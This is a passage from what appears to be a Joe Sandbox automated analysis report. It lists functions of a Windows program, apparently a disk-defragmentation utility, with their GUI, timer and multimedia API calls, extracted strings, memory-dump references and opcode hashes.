                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16112175A18300AED754EF789D92B6B77E4AF88704F84492EF848C3251F678D604CB9B
                                                                                                                                                                                                                                                                                    Function 004226A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                    • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                    • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                    • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                    Function 0040DE10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetRectEmpty.USER32(0000000C), ref: 0040DE94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EmptyRect
                                                                                                                                                                                                                                                                                    • String ID: Button$CDoubleDraw$Default
                                                                                                                                                                                                                                                                                    • API String ID: 2270935405-580154339
                                                                                                                                                                                                                                                                                    • Opcode ID: 46be97038f1fb4e2fb67b84b2aff2fccaa5b1abb12b68c42fd26aa523238d7ea
                                                                                                                                                                                                                                                                                    • Instruction ID: ef19d2a367d3f1db560aaf5cf05e81b0258e296f30c95c9ac20d7302b86fa88f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46be97038f1fb4e2fb67b84b2aff2fccaa5b1abb12b68c42fd26aa523238d7ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611ABB1A447119BD3109F56CC42B97B6E8EB48B24F108A2FF519E72C1D7BC680447DD
                                                                                                                                                                                                                                                                                    Function 00402590 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402044$8F$CPUIdleTime
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-857541521
                                                                                                                                                                                                                                                                                    • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                    • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                    Function 00424C20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00424CBC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ForegroundWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 3090259878-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: 97bd9b1b53d6aef3ed17526462021dcfe5d6cbecdb0f1cda4c00632df29fd43d
                                                                                                                                                                                                                                                                                    • Instruction ID: ff35304039ef3caa91a8c7fa2670423d8e8baf8e47749fa24285b4291bdfe834
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97bd9b1b53d6aef3ed17526462021dcfe5d6cbecdb0f1cda4c00632df29fd43d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8611BB71648344ABD330CF14DD82F96B7A8FB59720F004B2EF859836C0DA79A980CA5A
                                                                                                                                                                                                                                                                                    Function 0046C4F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                    • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                    Function 00402660 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402045$8F$CPUUsageExceed
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3685332712
                                                                                                                                                                                                                                                                                    • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                    Function 0041E1D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                    • mciGetErrorStringW.WINMM(00000000,?,00000080,00000001,00000001,?), ref: 0041E23D
                                                                                                                                                                                                                                                                                    • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                    • String ID: %s/n
                                                                                                                                                                                                                                                                                    • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                    • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                    • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                    Function 004014C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50filewindowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                    • String ID: >=
                                                                                                                                                                                                                                                                                    • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                    • Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                    • Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
                                                                                                                                                                                                                                                                                    Function 0041C260 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                    • #354.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$#354FileSystem
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                    • API String ID: 253409978-3598614746
                                                                                                                                                                                                                                                                                    • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                    • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                    Function 0042CF80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CF9B
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042CFF6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRedrawSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1030633669-2789391384
                                                                                                                                                                                                                                                                                    • Opcode ID: 322b72833a8646d25a97c7267da0ac355cbd00ada31bdbfef420a7c5b9529279
                                                                                                                                                                                                                                                                                    • Instruction ID: d25022c26ba7c65596874a3e6aca49c08802d942c9937e1375339a52bc2b998b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 322b72833a8646d25a97c7267da0ac355cbd00ada31bdbfef420a7c5b9529279
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46018B313006119BD7349A79DA89FDFB3A5AB94700F15481FF24ABB2C0CAF47881C64C
                                                                                                                                                                                                                                                                                    Function 00467260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _TrackMouseEvent.COMCTL32(?), ref: 004672A8
                                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 004672BA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004672CD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
